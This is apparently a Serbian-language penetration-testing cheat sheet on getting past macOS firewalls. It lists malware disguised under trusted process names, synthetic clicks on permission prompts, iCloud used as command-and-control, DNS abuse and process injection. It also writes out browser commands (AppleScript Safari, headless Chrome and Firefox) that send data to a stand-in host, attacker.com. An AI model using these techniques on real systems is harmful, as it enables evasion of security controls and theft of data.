macOS Bypassing Firewalls

Found techniques

Sledeće tehnike su pronađene kao funkcionalne u nekim macOS firewall aplikacijama.

Abusing whitelist names

• Na primer, pozivanje malvera sa imenima poznatih macOS procesa kao što su launchd

Synthetic Click

• Ako firewall traži dozvolu od korisnika, neka malver klikne na dozvoli

Use Apple signed binaries

• Kao što su curl, ali i drugi poput whois

Well known apple domains

Firewall bi mogao da dozvoli veze sa poznatim Apple domenima kao što su apple.com ili icloud.com. I iCloud bi mogao da se koristi kao C2.

Generic Bypass

Neke ideje za pokušaj zaobilaženja firewalla

Check allowed traffic

Poznavanje dozvoljenog saobraćaja će vam pomoći da identifikujete potencijalno belu listu domena ili koje aplikacije imaju dozvolu da im pristupe.

lsof -i TCP -sTCP:ESTABLISHED

Zloupotreba DNS-a

DNS rezolucije se vrše putem mdnsreponder potpisane aplikacije koja će verovatno biti dozvoljena da kontaktira DNS servere.

Putem aplikacija pregledača

• oascript

tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell

• Google Chrome

"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"

• Firefox

firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"

• Safari

open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

Putem injekcija procesa

Ako možete injektovati kod u proces koji ima dozvolu da se poveže sa bilo kojim serverom, mogli biste zaobići zaštitu vatrozida:

Reference

• https://www.youtube.com/watch?v=UlT5KFTMn2k